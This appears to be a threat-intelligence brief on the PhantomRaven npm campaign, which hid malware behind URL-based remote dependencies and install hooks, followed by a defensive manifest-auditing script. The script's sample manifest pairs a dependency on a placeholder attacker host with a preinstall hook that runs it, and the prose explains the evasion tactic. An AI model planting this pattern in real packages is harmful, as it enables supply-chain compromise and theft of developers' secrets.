PhantomRaven npm: 200+ Packages Using Remote Dynamic Dependencies
Category: Threat Intelligence / Supply Chain
PhantomRaven campaign flooded npm with 200+ malicious packages (86,000+ potential victims) using a new evasion tactic: remote dynamic dependencies. What's clever: packages advertise 'zero dependencies' for false safety, but contain URL-based imports pointing to attacker-controlled servers. When installed, npm itself downloads the actual malicious package from the remote server—the secondary package grabs environment variables, collects system info, and exfiltrates to remote URLs. Analysis of 'petstore-integration-test' shows evolution: v1.0.0 used earlier malware without remote deps, while v1.0.3 and v99.0.0 incorporated advanced evasion. Sonatype tracked 83 additional packages beyond the initial discovery; attackers brandjack organizations like Adobe and Airbnb or impersonate MCP servers.
CORTEX Protocol Intelligence Assessment
By offloading malicious code to external servers, these packages bypass static analysis looking for known attack patterns. The 'zero dependencies' claim tricks both developers and scanners. What's particularly nasty: attackers can deliver clean code to some users and malware to others, making analysis tricky. The campaign started August 2025 and targets the build process itself—lifecycle hooks execute during install, reaching dev machines, CI/CD runners, and container pipelines before runtime.
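The two install-time signals described above (a dependency whose specifier is a remote URL rather than a registry version, and a lifecycle hook that runs during install) can be checked in a manifest before anything is installed. The script below is an added example, not code from the PhantomRaven write-up or from any vendor; the sample manifest, package names and `attacker-host.invalid` hostname are constructed placeholders.

```javascript
// Flag package.json manifests that pull dependencies from arbitrary URLs
// (npm fetches these itself, outside the registry) and that register
// lifecycle hooks which execute at install time.
const REMOTE_SPEC = /^(https?:\/\/|git(\+\w+)?:\/\/|git@|github:|gitlab:|bitbucket:|gist:)/i;
const DEP_FIELDS = ["dependencies", "devDependencies", "optionalDependencies", "peerDependencies"];
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Audit one parsed package.json object; returns an array of findings.
function auditManifest(pkg) {
  const findings = [];
  for (const field of DEP_FIELDS) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      // A URL or git specifier means the package body comes from a server
      // the publisher controls, not from the registry the name suggests.
      if (typeof spec === "string" && REMOTE_SPEC.test(spec)) {
        findings.push({ kind: "remote-dependency", field, name, spec });
      }
    }
  }
  for (const hook of INSTALL_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (cmd) findings.push({ kind: "install-hook", name: hook, spec: cmd });
  }
  return findings;
}

// Constructed manifest mimicking the pattern described in the assessment:
// a URL-based dependency (placeholder host) plus a hook that runs on install.
const SAMPLE_MANIFEST = {
  name: "example-integration-test",
  version: "1.0.3",
  dependencies: { "helper-lib": "http://attacker-host.invalid/npm/helper-lib" },
  scripts: { preinstall: "node node_modules/helper-lib/index.js" },
};

function auditSample() {
  return auditManifest(SAMPLE_MANIFEST);
}

for (const f of auditSample()) {
  console.log(`${f.kind}: ${f.name} -> ${f.spec}`);
}
```

Run it over the manifests unpacked by `npm install --ignore-scripts` into a scratch directory, so hooks are inspected before they are allowed to execute.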
Strategic Intelligence Guidance
- 200+ malicious packages, 86K+ potential victims before discovery
- Evasion technique: remote dynamic dependencies via URL-based imports
- Primary targets: npm tokens, environment variables with secrets, source-control credentials
- Evolution visible in petstore-integration-test: v1.0.0 → v1.0.3 → v99.0.0
- Brands impersonated: Adobe, Airbnb, MCP servers for social engineering
Impact
Data Volume: 86K+ potential victims
Financial: 200+ packages
Intelligence Source: PhantomRaven: npm Malware Evolves Again | Nov 1, 2025